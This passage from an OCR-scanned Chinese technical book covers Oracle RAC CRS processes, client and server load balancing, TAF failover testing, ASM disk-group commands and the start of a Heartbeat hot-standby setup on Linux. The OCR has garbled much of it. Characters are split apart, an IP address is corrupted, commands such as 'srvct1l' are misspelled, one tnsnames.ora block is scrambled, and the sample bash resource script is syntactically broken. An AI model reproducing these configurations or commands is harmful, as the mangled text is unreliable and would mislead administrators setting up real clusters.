移 到 另 一 个 节点 。 接 着 启动 CRS 服务 ， 执 行 如 下 操作 : 


[root@node-racl ~]# /etc/init.d/init.crs start 


Startup will be queued to init within 30 seconds. 
CRS 启动 后 ， 主 要 有 以 下 4 个 后 台 进 程 : 


[oracleenode-racl ~]$ ps -eflgrep d.bin 

root 5166 4186 0 Sep07 ? 00:02:33 /app/oracrs/product/11.0.6/crs/bin/ 
crsd.bin reboot 

oracle 5176 5170 0 Sep07 ? 00:00:05 /app/oracrs/product/11.0.6/crs/bin/ 
evmd.bin 

oracle 5840 5309 0 Sep07 ? 00:01:04 /app/oracrs/product/11.0.6/crs/bin/ 


ocssd.bin 


oracle 6306 1 0 Sep07 ? 00:00:00 /app/oracrs/product/11.0.6/crs/bin/ 
oclskd.bin 

oracle 30233 30185 0 10:01 pts/1 00:00:00 grep d.bin 

下 面 简单 介绍 每 个 进程 的 含义 。 


@ ocssd: 用 于 管理 与 协调 集群 中 各 节点 的 关系 ， 并 用 于 节点 间 通 信 。 该 进程 非常 重要 ， 
如 果 这 个 进程 异常 中 止 ， 会 导致 系统 自动 重启 。 在 某 些 极端 情况 下 ， 如 果 ocssd 无 法 
正常 启动 ， 将 会 导致 操作 系统 循环 重启 。 

@ crsd: 监控 节点 的 各 种 资源 ， 当 某 个 资源 发 生 异常 时 ， 自 动 重启 或 者 切换 该 资源 。 

evmd: 是 一 个 基于 后 台 的 事件 检测 程序 。 

@ oclskd: 该 守护 进程 是 Oracle 11g ( 11.1.0.6 ) 新 增 的 一 个 后 台 进 程 , 主要 用 于 监控 RAC 


4.2.16 测试 Oracle RAC 数据 库 的 集群 功能 


Oracle RAC 是 一 个 集群 数据 库 ， 可 以 实现 负载 均衡 和 故障 无 颖 切换 ， 如 何 知道 RAC 数据 
库 已 经 实现 了 这 些 功 能 呢 ? 下 面 就 分 别 对 RAC 客户 端 和 服务 端 进行 功能 测试 。 


1. 负载 均衡 测试 


RAC 数据 库 的 负载 均衡 是 指 对 数据 库 连 接 的 负载 均衡 , 当 一 个 新 的 会 话 连接 到 RAC 数据 
库 时 ， 通 过 指定 的 分 配 算法 将 请 求 分 配 到 集群 的 任 一 节点 ， 这 就 是 RAC 数据 库 完 成 的 功能 。 
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负载 均衡 在 RAC 中 分 为 两 种 : 一 种 是 基于 客户 端 连接 的 负载 均衡 ， 另 一 种 是 基于 服务 器 端的 
负载 均衡 。 


(1) RAC 客户 端 负 载 均衡 

客户 端 连接 的 负载 均衡 配置 非常 简单 ,与 RAC 数据 库 的 实例 负载 和 监听 没有 任何 关 
系 ， 因 此 也 就 不 需要 在 集群 节点 做 任何 设置 ， 要 做 的 仅仅 是 在 客户 端 机 器 上 的 
tnsnames.ora 文件 中 添加 负载 均衡 策略 配置 即 可 。 这 里 以 Linux 客户 端 为 例 ， 需 要 修改 的 
设置 如 下 : 


@ 在 客户 端 修改 /etc/hosts 文件 ， 由 于 上 面 已 做 好 配置 ， 切 尽 不 要 在 RAC 节点 再 做 任何 


修改 。 
编辑 /etc/hosts 文件 ， 将 RAC 数据 库 相 关 的 了 P 地 址 信息 添加 进去 。 例 如 : 
192.168.12.231 node-racl 
192.168.12.232 node-rac2 
920.168:12-230 node-vipl 
192.168.12.240 node-vip2 


更 多 配置 参见 “ 表 4.2 IP 地 址 分 配 表 ”。 

客户 端 连接 的 负载 均衡 配置 非常 简单 ， 与 RAC 数据 库 的 实例 负载 和 监听 没有 任何 关系 ， 
因此 也 就 不 需要 在 集群 节点 做 任何 设置 , 要 做 的 仅仅 是 在 客户 端 机 器 上 的 tnsnames.ora 文件 中 
添加 负载 均衡 策略 配置 即 可 。 这 里 以 Linux 客户 端 为 例 ， 需 要 修改 如 下 设置 。 


@ 查看 RAC 数据 库 的 service_names。 


[oracle@node-racl ~]$ sqlplus "/as sysdba" 

SQL*Plus: Release 11.1.0.6.0 - Production on Sun Sep 12 22:05:53 2010 
Copyright (c) 1982, 2007, Oracle. All rights reserved. 

Connected to: 

Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production 
With the Partitioning, Real Application Clusters, OLAP, Data Mining 
and Real Application Testing options 

NAME TYPE VALUE 


service names string racdb 


这 里 需要 说 明 的 是 ， 在 配置 RAC 负载 均衡 时 ， 客 户 端 连接 的 是 RAC 数据 库 的 服务 名 ， 
而 不 是 实例 名 ， 也 就 是 说 ，SERVICE_ NAME 必须 设置 为 “SERVICE NAME =racdb”。 


@ 修改 Oracle 客户 端 配置 msnames.ora 文件 。 


RACDB= 
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(DESCRIPTION = 
(ADDRESS LIST = 
1521)) // 增 加 行 
(ADDRESS = (PROTOCOL = TCP) (HOST 1521)) // 增 加 行 
(LOAD BALANCE = yes) // 增 加 行 
) 
(CONNECT DATA = 
(SERVER = DEDICATED) 


(ADDRESS = (PROTOCOL = TCP) (HOST 


node-vip2) (PORT 


node-vipl1) (PORT 


Ul 


(SERVICE NAME = racdb) 


) 
对 这 个 配置 说 明 如 下 。 


@ LOAD BALANCE =yes: 表示 启用 连接 负载 均衡 ,在 默认 情况 下 “LOAD BALANCE 
=no”， 因 此 如 果 要 配置 负载 均衡 ， 必 须 添 加 设置 “LOAD _BALANCE =yes”。 启 用 负 
载 均衡 后 ，SQLNet 会 随机 选择 ADDRESS_LIST 列表 中 的 任意 一 个 监听 ， 然 后 将 请 求 
分 发 到 此 监听 上 ， 通 过 这 种 方式 完成 负载 均衡 。 如 果 “LOAD _ BALANCE = no"， 那 
么 SQLNet 会 按照 ADDRESS_LIST 列表 中 的 顺序 选择 监听 ， 只 要 这 个 监听 正常 就 一 
直 使 用 该 监听 。 

@ SERVICE NAME=racdb: 这 个 “racdb” 是 RAC 数据 库 的 服务 名 ， 而 非 实 例 名 。 


@ 在 客户 端 测试 负载 均衡 。 
在 客户 端 开启 一 个 sqlplus 连接 ， 执 行 如 下 操作 : 


[oracle@client ~]$ sqlplus system/xxxxxx@racdb 

SQL*Plus: Release 11.1.0.7.0 - Production on Sun Sep 12 21:24:55 2010 
Copyright (c) 1982, 2008, Oracle. All rights reserved. 

Connected to: 

Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production 
With the Partitioning, Real Application Clusters, OLAP, Data Mining 
and Real Application Testing options 

SQL> show parameter instance name // 查 看 连接 到 哪个 节点 上 

NAME TYPE VALUE 


instance name string racdbl // 系 统 随 机 地 把 连接 请 求 分 配 到 racdbl 节点 上 
然后 继续 开启 第 2 个 sqlplus 连接 ， 执 行 如 下 操作 : 


[oracle@client ~]$ sqlplus system/xxxxxx@racdb 


SQL*Plus: Release 11.1.0.7.0 - Production on Sun Sep 12 21:31:53 2010 
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Copyright (c) 1982, 2008, Oracle. All rights reserved. 

Connected to: 

Oracle Database 11g Enterprise Edition Release 11.1.0.6.0 - Production 
With the Partitioning, Real Application Clusters, OLAP, Data Mining 
and Real Application Testing options 

SQL> show parameter instance name 

NAME TYPE VALUE 


instance name string racdb2 // 第 二 次 连接 我 们 看 到 分 配 到 了 racdb2 上 


按照 这 种 方法 陆续 打开 多 个 sqlplus 连接 ， 可 以 看 到 ， 每 次 连接 到 的 实例 都 在 racdbl 和 


racdb2 之 间 变 化 ， 这 样 就 实现 了 RAC 数据 库 连 接 的 负载 均衡 。 


(2) 服务 器 端的 负载 均衡 
修改 服务 器 端 msnames.ora， 只 需 添加 如 下 内 容 即 可 : 


LISTENERS_ RACDB = 
(ADDRESS LIST = 
(ADDRESS = (PROTOCOL = TCP) (HOST = node-vip2) (PORT = 1521)) 
(ADDRESS = (PROTOCOL = TCP) (HOST = node-vipl) (PORT = 1521)) 
) 


修改 参数 remote_listener， 查 看 RAC 数据 库 的 参数 remote_listener: 


SQL> show parameter remote listener 
NAME TYPE VALUE 


remote listener string LISTENERS RACDB 


可 以 看 到 ，remote_listener 已 经 设置 为 “LISTENERS RACDB” 了 。 
如 果 此 值 为 室 ， 可 以 通过 如 下 命令 修改 每 个 实例 的 remote_listener 参数 : 


SQL> alter system set remote listener='LISTENERS RACDB' sid='node-racil' 


SQL> alter system Set remote listener='LISTENERS RACDB' sid='node-rac2'; 


这 样 ， 服 务 器 端的 负载 均衡 就 配置 完成 了 。 
2. 透明 应 用 失败 切换 测试 


透明 应 用 失败 切换 (Transparent Application Failover， 简 称 TAF ) ， 是 客户 端的 一 种 功能 ， 


TAF 包含 两 层 意 思 : 失败 切换 是 指 客户 端 连接 到 某 个 实例 ， 如 果 连 接 失 败 ， 可 以 连接 到 
一 个 实例 ， 透 明 应 用 是 指 客户 端 应 用 程序 在 连接 失败 后 可 以 自动 重新 连接 到 另 一 个 数据 
例 ， 而 这 个 过 程 对 应 用 程序 是 不 可 见 的 。 


时 外 
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要 使 用 TAF 功能 ， 只 需 修改 客户 端 中 tnsnames.ora 文件 的 配置 即 可 ， 结 合 上 面 介绍 的 客 
户 端 负载 均衡 功能 ， 一 个 包含 负载 均衡 和 TAF 功能 的 客户 端 设置 如 下 : 


RACDB = 


(DESCRIPTION = 
(ADDRESS LIST = 
(ADDRESS = (PROTOCOL = TCP) (HOST = node-vip2) (PORT = 1521)) 
(ADDRESS = (PROTOCOL = TCP) (HOST = node-vipl) (PORT = 1521)) 
(LOAD BALANCE = yes) 
} 
(CONNECT_ DATA = 
(SERVER = DEDICATED) 
(SERVICE NAME = racdb) 
(FAILOVER MODE = 
(TYPE=SELECT) 
(MODE=BASIC) 
(RETRY=3) 
(DEALY=5) 
) 


) 


对 里 面 几 个 参数 解释 如 下 。 


TYPE: 用 于 指定 FAILOVER_MODE 的 类 型 ， 有 三 种 类 型 可 选 ， 分 别 是 session、select 
和 none。 

session: 表示 当 一 个 正在 连接 的 会 话 实例 发 生 故 障 时 ， 系 统 可 以 自动 将 会 话 切换 到 其 
他 可 用 的 实例 ， 而 应 用 程序 无 须 再 次 发 起 连接 请 求 ， 但 是 发 生 实例 故障 时 正在 执行 的 
SQL 需要 重新 执行 。 

select: 表示 如 果 正 在 连接 的 实例 发 生 故 障 ， 将 使 用 游标 和 之 前 的 快照 继续 执行 select 
操作 ， 其 他 操作 必须 要 重新 执行 。 

none: 客户 端 默认 值 ， 表 示 森 止 SQL 接管 功能 。 

MODE: 表示 连接 模式 ， 也 有 两 种 类 型 ， 分 别 是 basic 和 preconnect。 

basic: 表示 在 建立 初始 连接 时 仅 连接 到 一 个 节点 ， 并 且 只 有 在 发 生 节点 故障 时 才 连 接 


Preconnect: 表示 在 建立 初始 连接 时 就 连接 到 主 节点 和 备用 节点 。 
RETRY: 表示 当前 节点 失败 后 ， 失 败 切换 功能 尝试 连接 备用 节点 的 次 数 。 
DELAY: 表示 两 次 尝试 之 间 等 待 的 秒 数 。 


客户 端 监听 设置 完毕 后 ， 重 启 客户 端 服 务 ， 然 后 执行 下 面 的 操作 ; 
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[oracle@client ~]$sqlplus system/xxxxxx@racdb 

SQL*Plus: Release 11.1.0.7.0 =- Production on Sun Sep 12 23:23:15 2010 

Copyright (c) 1982, 2008, Oracle. All rights reserved. 

Connected to: 

Oracle Database 11g9 Enterprise Edition Release 11.1.0.6.0 - Production 

With the Partitioning, Real Application Clusters, OLAP, Data Mining 

and Real Application Testing options 

SQL> COLUMN instance name FORMAT al0 

SQL> COLUMN host name FORMAT al0 

SQL> COLUMN failover method FORMAT al5 

SQL> COLUMN failed over FORMAT al0 

SQL> SELECT instance name, host name, NULL RS failover type, NULL AS 
failover method, NULL AS failed over FROM v$instance UNION SELECT NULL, NULL, 
failover type , failover method, failed over FROM v$session WHERE username = 
'SYSTEM'; 

INSTANCE NAME HOST NAME FAILOVER TYPE FAILOVER METHOD FAILED OVER 


racdb2 node-rac2 SELECT BASIC NO 
此 时 ， 不 断 开启 此 连接 ， 然 后 在 RAC 数据 库 的 任意 一 个 节点 执行 如 下 语句 : 
[oracle@node-rac2 ~]$ srvct1l stop instance -d racdb -i racdb2 


关闭 node-rac2 节点 的 racdb2 实例 后 ， 继 续 在 前 面 的 SQL 命令 行 执行 相同 的 语句 ， 结 果 
如 下 : 


INSTRNCE NAME HOST NAME FAILOVER TYPE FAILOVER METHOD FAILED OVER 


racdbl node-racl SELECT BASIC YES 


从 输出 可 以 看 到 ， 上 面 的 SQL 会 话 已 经 切换 到 了 node-racl 的 实例 racdbl 上 ， 也 就 是 实 
现 了 故障 自动 切换 功能 。 至 此 ， 关 于 RAC 数据 库 的 功能 测试 已 经 验证 完毕 了 。 


4.2.17 ASM 基本 操作 


1. ASM 的 体系 结构 与 后 台 进 程 


要 使 用 ASM， 需 要 在 启动 数据 库 实例 之 前 ， 先 启动 一 个 名 为 “+ASM ”的 实例 ，ASM 实 
例 不 会 装载 数据 库 ， 它 启动 的 目的 是 为 了 管理 磁盘 组 和 保护 其 中 的 数据 。 同 时 ，ASM 实例 还 
可 以 向 数据 库 实例 传递 有 关 文 件 布 局 的 信息 。 通过 这 种 方式 , 数据 库 实例 就 可 以 直接 访问 磁盘 
组 中 存储 的 文件 。 下 面 是 ASM 的 一 般 体系 结构 。 
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ASM 实例 与 数据 库 实 例 进行 通信 的 桥梁 是 ASMB 进程 ，ASM 本 质 上 是 由 Oracle 管理 的 
一 个 文件 系统 ， 但 与 一 般 的 Linux 文件 系统 不 同 ， 它 不 能 使 用 ls 之 类 的 Shell 命令 查看 ASM 
内 部 情况 ， 它 只 能 被 Oracle 对 象 使 用 。ASM 使 用 一 个 小 的 Oracle 实例 管理 其 设备 ， 这 个 实例 
称 为 “ASM 实例 ”。 此 进程 运行 在 每 个 数据 库 实例 上 ， 是 两 个 实例 间 信 息 交换 的 通道 ， 它 先 
利用 磁盘 组 名 称 通过 CSS 获得 管理 该 磁盘 组 的 ASM 实例 连接 串 ， 然 后 建立 一 个 到 ASM 的 持 
久 连 接 , 这 样 两 个 实例 之 间 就 可 以 通过 这 条 连接 定期 交换 信息 ,同时 这 也 是 一 种 心跳 监控 机 制 。 

通过 上 面 步骤 ，ASM 磁盘 创建 完毕 ， 可 以 查看 系统 的 /dev/oracleasm/disks/ 目 录 下 是 否 已 
经 生成 磁盘 设备 。 可 以 通过 如 下 命令 查看 ASM 磁盘 : 


# ls /dev/oracleasm/disks/ASMDISK* 


brw-rw---- 1 oracle oinstall 8, 21 Sep 11 22:40 /dev/oracleasm/disks/ASMDISK1 
brw-rw---- 1 oracle oinstall 8, 22 Sep 11 22:40 /dev/oracleasm/disks/ASMDISK2 
brw-rw---- 1 oracle oinstall 8, 23 Sep 11 22:36 /dev/oracleasm/disks/ASMDISK3 
brw-rw---- 1 oracle oinstall 8, 24 Sep 11 22:40 /dev/oracleasm/disks/ASMDISK4 


也 可 以 通过 如 下 方式 查看 : 


#service oracleasm listdisks 
RASMDISK1 
ASMDISK2 
ASMDISK3 
ASMDISK4 


如 果 要 删除 ASM 磁盘 ， 可 通过 以 下 命令 : 


#/etc/init.d/oracleasm deletedisk ASMDISKS5 
Removing ASM disk "ASMdisk5" [ OK ] 


在 RAC 环境 中 ， 要 注意 另外 一 个 节点 是 否 能 发 现 对 应 的 ASM Disk， 可 执行 如 下 命令 ， 
让 另 一 个 节点 来 获取 这 种 变化 : 


#/etc/init.d/oracleasm scandisks 
到 此 为 止 ASM 磁盘 已 经 创建 完毕 了 。 
2. 启动 ASM 实例 


在 RAC 环境 中 ，ASM 实例 需要 用 到 CSS 进程 ， 启 动 CRS 后 CSS 已 经 运行 ， 启 动 ASM 
实例 如 下 : 


$export ORACLE SID=+ASM 
$sqlplus / as sysdba 


SQL> startup 
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ASM instance started 


Total System Global Area 134217728 bytes 


Fixed Size 1218124 bytes 
Variable Size 107833780 bytes 
ASM Cache 25165824 bytes 


3. 管理 ASM 磁盘 组 


ASM 磁盘 组 是 作为 逻辑 单元 进行 统一 管理 的 一 组 磁盘 ， 在 ASM 实例 中 ， 可 以 创建 和 添 
加 新 的 磁盘 组 , 还 可 以 修改 现 有 的 磁盘 组 , 在 其 中 添加 一 个 磁盘 或 者 删除 一 个 磁盘 ,也 可 以 删 
除 现 有 的 磁盘 组 : 


SQL> create diskgroup FLASH DISK external redundancy disk '/dev/oracleasm/ 
disks/ASMDISK1' name flashdisk; 

Diskgroup created. 

SQL> create diskgroup ARCH DISK external redundancy disk '/dev/oracleasm/ 
disks/ASMDISK2' name archdiskl; 

Diskgroup created. 

SQL> create diskgroup DATA DISK normal redundancy disk '/dev/oracleasm/ 
disks/ASMDISK4' name datadiskl, '/dev/oracleasm/disks/ASMDISK5' name datadisk2; 


Diskgroup created. 


4. 查看 磁盘 组 状态 


SQL> select namev state from v$asm diskgroup; 


NAME STATE 
FLASH_ DISK MOUNTED 
RARCH_DISK MOUNTED 
DATA_DISK MOUNTED 


5. 挂 载 FLASH DISK 磁盘 组 


SQL> alter diskgroup FLASH DISK mount; 
Diskgroup altered. 


SQL> select name state from v$asm diskgroup; 


NAME STATE 
FLASH DISK MOUNTED 
ARCH _ DISK MOUNTED 


DATA DISK MOUNTED 
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6. 在 磁盘 组 中 增加 一 个 磁盘 
当 磁 盘 空 间 用 完 时 ， 我 们 需要 向 磁盘 组 中 增加 一 个 磁盘 ， 具 体操 作 如 下 : 


SQL> ALTER DISKGROUP ARCH DISK ADD DISK '/dev/oracleasm/disks/ASMDISK3' name 
ARCHDISK2; 
Diskgroup altered. 


最 后 ， 查 看 一 下 每 个 磁盘 组 的 可 用 大 小 : 


SQL> select name,allocation unit size,total mb from v$asm diskgroup; 


NAME ALLOCATION UNIT SIZE TOTAL MB 
FLASH DISK 1048576 3815 
ARCH_ DISK 1048576 4292 
DATA_DISK 1048576 954 


SQL> select name,path from v$asm disk stat; 


NAME PATH 

DATADISK2 /dev/oracleasm/disks/ASMDISKS5 
DATADISK1 /dev/oracleasm/disks/ASMDISK4 
ARCHDISK2 /dev/oracleasm/disks/ASMDISK3 
ARCHDISK1 /dev/oracleasm/disks/ASMDISK2 
FLASHDISK /dev/oracleasm/disks/ASMDISK1 
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可 以 看 出 ， 磁 盘 组 ARCH_DISK 的 大 小 发 生 了 变化 ， 也 就 说 明 添加 磁盘 成 功 。 


注意 : 在 升级 Linux 系统 时 应 当 小 心 ， 建 议 不 要 使 用 up2date、yum yast 等 工具 自动 升级 ， 
它们 可 能 存在 一 些 问题 ， 前 面 也 花 了 大 量 篇 幅 介 绍 Oracle 的 特点 和 要 求 ， 它 依赖 特定 版 本 的 
gcc、libstdc、make 和 Java 运行 环境 ， 当 使 用 自动 升级 时 ， 这 些 组 件 也 会 随 之 升级 ， 从 而 导致 
RAC 失效 。 


本 章 详 细 讲解 了 Oracle、RAC 的 安装 和 配置 并 给 出 了 更 详细 的 说 明 ， 相 信 大 多 数 读者 对 
照 着 详细 安装 步骤 都 能 把 系统 配置 好 , 当然 RAC 是 一 个 相当 复杂 的 产品 ,与 安装 独立 的 Oracle 
系统 相 比 ， 它 对 硬件 依赖 的 更 多 ， 部 署 RAC 集群 时 要 明白 ， 实 际 上 是 四 成 部 署 加 六 成 调试 ， 
这 样 来 看 待 RAC 的 部 署 ， 遇 到 问题 时 才 不 会 感到 泪 丧 ， 只 要 你 有 兴趣 、 有 耐心 就 一 定 能 成 功 。 
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5.1 基于 Heartbeat 的 双 机 热 备 系统 范例 


本 节 中 的 系统 采用 免费 开源 的 基于 Linux-HA (Linux 高 可 用 性 ) 项 目下 的 Heartbeat 搭建 
了 一 个 纯 软件 模式 的 双 机 热 备 平台 ， 根 据 本 章 介 绍 的 方法 ， 即 使 是 Linux 新 手 也 能 较 快 地 建 
立 一 个 双 机 热 备 系统 ， 可 胜任 中 小 企业 的 电子 商务 、ERP、CRM 等 关键 业务 应 用 。 

在 通常 的 Heartbeat 配置 中 ， 这 些 文件 在 主 服务 器 和 备份 服务 器 中 都 是 一 样 的 (如 果 不 是 
这 样 ， 则 会 将 复杂 而 隐秘 的 问题 带 入 高 可 用 配置 中 ) 。 本 章 演示 了 Heartbeat 系统 如 何 启 动 资 
源 并 将 故障 转移 到 一 台 备份 服务 器 ， 本 方案 需要 的 组 件 清单 如 下 : 

@ 两 个 运行 Red Hat Linux 的 服务 器 (每 台 服 务 器 带 双 千 兆 网 卡 )。 

@ 一 根 交叉 线 。 

@ 一 个 Heartbeat 软件 包 (http:/linux-ha.org/wiki/Downloads )。 


5.1.1 准备 工作 


在 该 方案 中 ， 称 其 中 一 台 Linux 服务 器 为 主 服务 器 ， 而 另 一 台 则 为 备份 服务 器 ， 首 先 通过 
交叉 线 ， 将 这 两 个 系统 相连 。 在 此 将 使 用 专用 于 心跳 消息 的 网 络 连 接 。 

如 果 正 在 使 用 的 是 以 太 网 心跳 连接 ， 则 为 主 服 务 器 和 备份 服务 器 分 配 I 地 址 ， 从 而 完成 
这 个 使 用 RFC 1918 中 的 了 瑟 地 址 的 网 络 连接 。 如 图 5.1 所 示 ， 在 主 服务 器 上 使 用 10.1.1.1， 在 
备份 服务 器 上 使 用 10.1.1.2〈 这 些 是 仅 能 被 主 服务 器 和 备份 服务 器 识别 的 瑟 地址 ) 。 


内 网 客户 机 


图 5.1 网 络 连接 图 
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在 该 方案 中 ， 将 把 10.1.1.1 作为 主 服务 器 的 心跳 卫 地 址 ，10.1.1.2 作为 辅助 服务 器 的 心跳 
IP 地址 。 在 进行 下 面 的 步骤 之 前 ， 确 保 能 够 在 刚刚 添加 的 网 络 连接 上 的 这 两 个 系统 之 前 ping 
通 ， 也 就 是 说 ， 当 在 主 服务 器 上 输入 ping 10.1.1.2 时 , 或 从 备份 服务 器 上 输入 ping 10.1.1.1 时 ， 
应 该 得 到 一 个 应 答 。 


5.1.2 安装 Heartbeat 


Heartbeat RPM 可 以 从 光盘 上 安装 ， 也 可 以 去 官网 上 下 载 安装 : 


#mount /mnt/cdrom 

#rpm -ivh /mnt/cdrom/HeartBeat-pils-*.rpm 
#rpm -ivh /mnt/cdrom/HeartBeat-stonith-*.rpm 
#rpm -ivh /mnt/cdrom/HeartBeat-*i386.rpm 


安装 过 程 非常 简单 ， 一 旦 安装 完成 ， 在 Heartbeat 配置 文件 和 脚本 的 位 置 将 有 个 /etc/ha.d/ 
目录 。 还 会 有 个 /usr/share/doc/packages/Heartbeat/ 目 录 ， 它 包含 了 实例 配置 文件 和 帮助 文档 。 

当 试图 安装 Stonith RPM 时 ， 如 果 因 为 隐蔽 软件 而 收 到 关于 依赖 性 失败 的 错误 消息 ， 请 执 
行 下 面 的 命令 ， 以 确保 openssl 和 openssl-devel 数据 包 已 经 安装 : 


#rpm -q -a | grep openssl 

只 有 使 用 SSL 进行 通信 的 Stonith 工具 才 需 要 这 些 数据 包 ， 但 由 于 RPM 的 依赖 性 设置 ， 
此 数据 包 将 被 所 有 安装 标记 为 “必须 ”。 如 果 这 些 命令 返回 的 版 本 号 比 Stonith 要 求 的 低 ， 则 
要 升级 软件 包 〈SNMP 数据 包 已 重 命名 为 net-snmp， 过 去 称 为 ucd-snmp) 。 如 果 在 已 确定 所 
安装 的 是 最 新 版 本 的 情况 下 仍然 出 现 依赖 性 失败 的 警告 ， 可 以 使 用 如 下 命令 强制 RPM 越过 错 


误 信 息 : 
#rpm -ivh --nodeps /usr/local/src/HeartBeat/HeartBeat-*i386.rpm 


注意 : 除了 以 上 方法 ， 还 可 以 使 用 Heartbeat 的 srcRPM 软件 包 和 RPM-rebuild 选项 ， 如 
下 面 的 命令 : 


#rpm --rebuild /usr/local/src/HeartBeat/HeartBeat-*src.rpm 


5.1.3 配置 /etc/ha.d/ha.cf 


现在 需要 告诉 Heartbeat 守护 程序 ， 让 它们 使 用 新 的 以 太 网 收发 Heartbeat 软件 包 。 
通过 如 下 命令 找到 Heartbeat RPM 安装 的 样本 配置 文件 ha.cf: 


#rpm -qd HeartBeat | grep ha.cf 


通过 如 下 命令 将 这 个 配置 文件 复制 到 指定 位 置 : 


#cp /usr/share/doc/packages/HeartBeat/ha.cf /etc/ha.d/ 


编辑 /etc/ha.d/ha.cf 文件 ， 并 注释 掉 下 面 两 行 : 
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#udpport 694 


#bcast eth0 # Linux 
例如 ， 要 使 用 ethl 在 主 服务 器 和 备份 服务 器 间 发 送 消息 ， 第 二 行 代码 如 下 所 示 : 
bcast ethl 


如 果 用 两 个 实际 网 络 连接 来 传送 心跳 ， 则 将 第 二 行 改 为 : 
bcast eth0 ethl 
如 果 使 用 一 个 串 行 连接 和 一 个 以 太 网 连接 ， 则 不 为 串 行 Heartbeat 通信 注释 掉 下 面 两 行 : 


serial /dev/ttys0 
baud 19200 


并 且 不 注释 行 keepalive、deadtime 和 initdead， 以 使 它们 如 下 表示 : 


keepalive 2 
deadtime 30 
initdead 120 


initdead 行 用 于 指定 在 Heartbeat 守护 程序 首次 运行 后 , 它 需要 等 待 120 秒 钟 才能 启动 主 服 
务 器 上 的 任何 资源 ， 或 在 备份 服务 器 做 出 发 生 故障 的 假设 。keepalive 行 指定 两 个 心跳 之 间 需 
间隔 多 少 分 钟 。deadtime 行 指定 在 未 接收 到 主 服务 器 的 Heartbeat 多 久 后 可 以 认定 备份 服务 器 
出 错 了 。 若 改变 这 些 数 字 ，Heartbeat 可 能 会 发 出 赋值 不 正确 的 警告 信息 例如， 为 确保 配置 
安全 ，deadtime 可 能 过 于 接近 keepalive 时 间 ) 。 

在 etc/ha.d/ha.cf 文件 末尾 添加 以 下 两 行 : 


node primary.mydomain.com 
node backup.mydomain.com 


在 两 台 主机 上 安装 Linux 时 ,应 当 用 primary/mydomain.com 和 backup/mydomain.com 项 蔡 
换 已 为 主机 分 配 的 名 称 〈 如 uname-n 命令 返回 的 结果 ) 。 

通常 ， 主 服务 器 和 备份 服务 器 的 主机 名 称 与 服务 器 所 提供 的 服务 不 相关 。 例 如 ， 主 服 
务 器 的 主机 名 可 以 是 primary.mydomain.com， 尽 管 它 将 是 名 为 mystufft mydomain.com 的 
Web 服务 器 的 宿主 。 


注意 : 在 Red Hat 系统 上 ， 使 用 hostname 变量 在 /etc/sysconfig/network 文件 中 指定 主机 名 
称 ， 也 可 以 通过 hostname 命令 在 运行 的 系统 上 修改 它 。 
5.1.4 配置 /etc/ha.d/haresources 


通常 ，/etc/ha.d/haresources 将 包含 主 服 务 器 可 能 拥有 的 资源 名 称 。Heartbeat 一 般 使 用 发 行 
版 所 带 的 标准 初始 化 脚本 , 或 自己 构建 的 脚本 , 来 控制 其 资源 。 下 面 暂时 使 用 一 个 简单 的 测试 
脚本 来 看 一 下 这 些 脚 本 是 如 何 工作 的 。 
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四 使 用 以 下 命令 在 /etc/ha.d/resource.d 目录 下 创建 一 个 testl 脚本 : 


#vi /etc/ha-d/resource-d/testl 


贺 输入 下 面 的 简单 bash 脚本 : 


#!/bin/bash 

logger $0 called with $1 

case "$1"” in 

start) 
# Start commands go here 
En 

stop) 

# Stop commands go here 


77 
status) 
# Status commands go here 


该 脚本 中 的 logger 命令 用 来 给 syslog 守护 程序 发 送 一 个 消息 ， 然 后 syslog 将 基于 
/etc/syslog.conf 文件 中 的 规则 ， 将 该 消息 写 入 适当 的 日 志文 件 。 


注意 : 该 脚本 中 的 case 语句 什么 也 不 做 ， 在 这 里 包括 该 语句 ， 只 是 作为 一 个 模板 ， 以 进 
一 步 开发 客户 资源 脚本 ， 该 脚本 可 以 处 理 Heartbeat， 用 来 控制 它 的 start、stop 和 status 参数 。 


加 退出 此 文件 并 保存 修改 ( 按 Esc 键 ， 然 后 输入 : wq) 。 
四 输入 下 面 的 命令 ， 让 该 脚本 成 为 可 执行 的 : 


#chmod 755 /etc/ha.d/resource.d/test 
加 通过 输入 下 面 的 命令 运行 该 脚本 : 

#/etc/ha.d/resource.d/test start 
国 现在 返回 到 外 壳 提 示 符 状态 ， 在 这 里 输入 以 下 命令 ， 以 查看 消息 的 尾部 : 
#tail /var/log/messages 


/var/log/messages 文件 的 最 后 一 个 消息 行 如 下 : 
[timestamp] localhost root: /etc/ha.d/resource.d/test called with start 


这 一 行 表示 ， 此 测试 资源 脚本 通过 start 参数 调用 ， 而 且 正在 正常 使 用 脚本 内 部 的 case 
语句 。 


5.1.5 配置 haresources 文件 


可 以 使 用 此 示范 测试 脚本 来 查看 Heartbeat 如 何 操作 资源 , 方法 是 告诉 Heartbeat 该 测试 是 
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一 个 资源 。 为 此 ， 可 使 用 以 下 命令 将 haresources 文件 定位 并 复制 到 合适 位 置 : 


#rpm -qd HeartBeat | grep haresources 
#cp /usr/share/doc/packages/HeartBeat/haresources /etc/ha.d 


现在 编辑 /etc/ha.d/haresources， 并 在 该 文件 尾 添加 下 一 行 : 


primary.mydomain.com test 


在 本 例 中 ，primary.mydomain.com 应 该 蔡 换 为 主 服 务 器 的 名 称 ， 即 命令 uname -返回 的 
名 称 。 

haresources 文件 通知 Heartbeat 程序 哪 台 机 器 拥有 资源 ， 资 源 名 实际 上 是 /etc/init.d 或 
/etc/ha.d/resource.d 目录 下 的 脚本 《〈 该 脚本 的 副本 必须 同时 存在 于 主 服务 器 和 备份 服务 器 上 ) 。 

Heartbeat 使 用 haresources 配置 文件 确定 它 第 一 次 启动 时 应 该 做 的 工作 。 例 如 ， 当 在 主 服 
务 器 上 启动 Heartbeat 守 护 程序 时 , 如果 将 httpd 脚本 (/etc/init.d/httpd) 指 定 为 一 个 资源 , Heartbeat 
就 会 运行 该 脚本 并 将 启动 命令 传递 给 它 。 如 果 告 诉 Heratbeat 停止 (用 命令 /etc/init.d/Heartbeat 
stop 或 者 服务 Heartbeat stop) ，Heartbeat 就 会 运行 /etc/init.d/httpd 脚本 并 把 停止 命令 传递 给 它 ， 
因此 ， 如 果 Heartbeat 没有 运行 ， 资 源 守 护 程序 〈 本 例 中 是 httpd) 也 不 会 运行 。 


注意 : 如 果 使 用 的 不 是 Red Hat 或 SUSE， 也 应 当 确 保 该 脚本 在 被 传递 status 参数 时 会 打 
印 OK、Running 或 running。 


